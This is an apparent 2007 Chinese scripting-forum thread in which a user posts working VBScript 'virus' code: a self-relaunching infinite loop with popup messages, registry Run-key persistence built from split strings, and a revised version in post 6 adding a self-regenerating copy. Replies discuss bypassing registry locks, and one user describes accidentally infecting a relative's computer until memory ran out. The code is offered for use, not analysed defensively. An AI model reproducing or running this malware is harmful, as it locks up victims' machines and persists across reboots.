|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『楼 主』:
病毒,VBS版
set ws=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
a="HKEY_CURRE"
b="NT_USER\Softw"
c="are\Microsoft\Win"
d="dows\C"
e="urrentVersion\Run\5174"
f="C:\Documen"
g="ts and Settings\"
h="5174.vbs"
if fso.fileexists("C:\Documents and Settings\5174.vbs")=false then
set cr=fso.createtextfile("5174.vbs")
cr.write "do"&chr(13)&chr(10)&_
"set ws=createobject("&chr(34)&"wscript.shell"&chr(34)&")"&chr(13)&chr(10)&_
"ws.run "&chr(34)&"5174.vbs"&chr(34)&chr(13)&chr(10)&_
"msgbox "&chr(34)&"阿晓,我好脆弱,快点解决我吧 ^^"&chr(34)&chr(44)&chr(44)&chr(34)&"洪水泛滥啦!"&chr(34)&chr(13)&chr(10)&_
"loop"
cr.close
fso.movefile "5174.vbs",f&g
end if
ws.regwrite a&b&c&d&e,f&g&h
ws.run chr(34)&f&g&h&chr(34)
set ws=nothing
set fso=nothing
[ Last edited by zhoushijay on 2007-6-20 at 11:46 AM ]
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
 2007-6-20 11:07 |
|
|
HAT
版主
积分 9023
发帖 5017
注册 2007-5-31
状态 离线
|
『第
2 楼』:
//阿晓,我好脆弱,快点解决我吧 ^^
是不是写"病毒"的人都比较有幽默感?^^
//ws.regwrite a&b&c&d&e,f&g&h
假设注册表已经锁定,这句还能成功吗?不懂vbs :'(
|
|
|
2007-6-20 12:13 |
|
|
lxmxn
版主
积分 11386
发帖 4938
注册 2006-7-23
状态 离线
|
『第
3 楼』:
在XP sp2下测试了一下,注册表锁定了还是可以写注册表的。
|
|
|
2007-6-20 12:27 |
|
|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『第
4 楼』:
发现了一个问题,从一个VBS文件启动另外一个VBS文件,另外一个VBS文件又要启动一个VBS文件,
VBS这样的传递做不到,有没有什么解决办法
还有,请问楼上注册表怎么锁定
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
|
2007-6-20 13:21 |
|
|
lxmxn
版主
积分 11386
发帖 4938
注册 2006-7-23
状态 离线
|
『第
5 楼』:
我是写注册表键值DisableRegistryTools为1。
|
|
|
2007-6-20 13:48 |
|
|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『第
6 楼』:
修改了一下,上面的代码有错误,再增加一个自生功能(自生功能保存的文件名必须是23.vbs)
set ws=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
on error resume next
a="HKEY_CURRE"
b="NT_USER\Softw"
c="are\Microsoft\Win"
d="dows\C"
e="urrentVersion\Run\5174"
f="C:\WINDOWS\"
g="system\"
h="5174.vbs"
if fso.fileexists("C:\WINDOWS\5174.vbs")=false then
set cr=fso.createtextfile("5174.vbs")
cr.write "do"&chr(13)&chr(10)&_
"set ws=createobject("&chr(34)&"wscript.shell"&chr(34)&")"&chr(13)&chr(10)&_
"ws.run "&chr(34)&h&chr(34)&chr(13)&chr(10)&_
"msgbox "&chr(34)&"阿晓,我好脆弱,快点解决我吧 ^^"&chr(34)&chr(44)&chr(44)&chr(34)&"洪水泛滥啦!"&chr(34)&chr(13)&chr(10)&_
"loop"
cr.close
fso.movefile "5174.vbs",f
fso.copyfile "23.vbs",f&g
end if
ws.regdelete a&b&c&d&e
ws.regwrite a&b&c&d&e,f&h
ws.regwrite a&b&c&d&"urrentVersion\Run\23",f&g&"23.vbs"
set ws=nothing
set fso=nothing [ Last edited by zhoushijay on 2007-6-20 at 02:16 PM ]
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
|
2007-6-20 14:14 |
|
|
slore
铂金会员
积分 5212
发帖 2478
注册 2007-2-8
状态 离线
|
『第
7 楼』:
Run的权限早设置了=。=C:\WINDOWS我也NTFS设置了权限=。=
VBS好好学些技巧好了,不要浪费精力到做这些事情上。。。
|
|
|
2007-6-20 18:57 |
|
|
429499381
中级用户
积分 452
发帖 202
注册 2006-12-21
状态 离线
|
『第
8 楼』:
我当时拿你的代码胡乱复制粘贴运行了一下, 只看见窗口闪了一下什么都没有出
现! 以为是我的2003企业版的系统不支持的原因, 也就没在意, 继续疯狂实
验其他的代码!! 后来第2天上班, 我弟弟(菜鸟)发了一条短信给我, 说:家里
的电脑中了VBS病毒, 不断出现窗口, 无法关闭, 直到内存为0。
我看了弟弟的描述基本明白怎么回事, 回家后问题很快解决!!
事后想想有点后怕, 我的硬盘里面有好几十G的资料!!!! 要
的。。。。。。。 恐怕我活不了, 上次也是胡乱实验XP的NTF
S加密和权限设置, 结果系统盘还原后其他盘的重要文件夹都无法访问, 怎
么实验也没有, 求助了好久, 试过了热心人的办法都无效, 最后还是忍痛
:P全盘格式化了
|
|
|
2007-8-9 00:19 |
|
|
knoppix7
银牌会员
积分 1287
发帖 634
注册 2007-5-2
来自 cmd.exe
状态 离线
|
『第
9 楼』:
NTF
S加密和权限.....
同情。
用哪个什么替换子容器的什么什么东西就可以解决了。。。
|
|
|
2007-8-9 12:51 |
|
|
429499381
中级用户
积分 452
发帖 202
注册 2006-12-21
状态 离线
|
『第
10 楼』:
要的能的话, 我早就OK 了, 何必欲哭无泪
|
|
|
2007-8-9 20:31 |
|
|
meicnk
初级用户
积分 22
发帖 11
注册 2006-9-1
状态 离线
|
|
|
2007-8-27 11:31 |
|
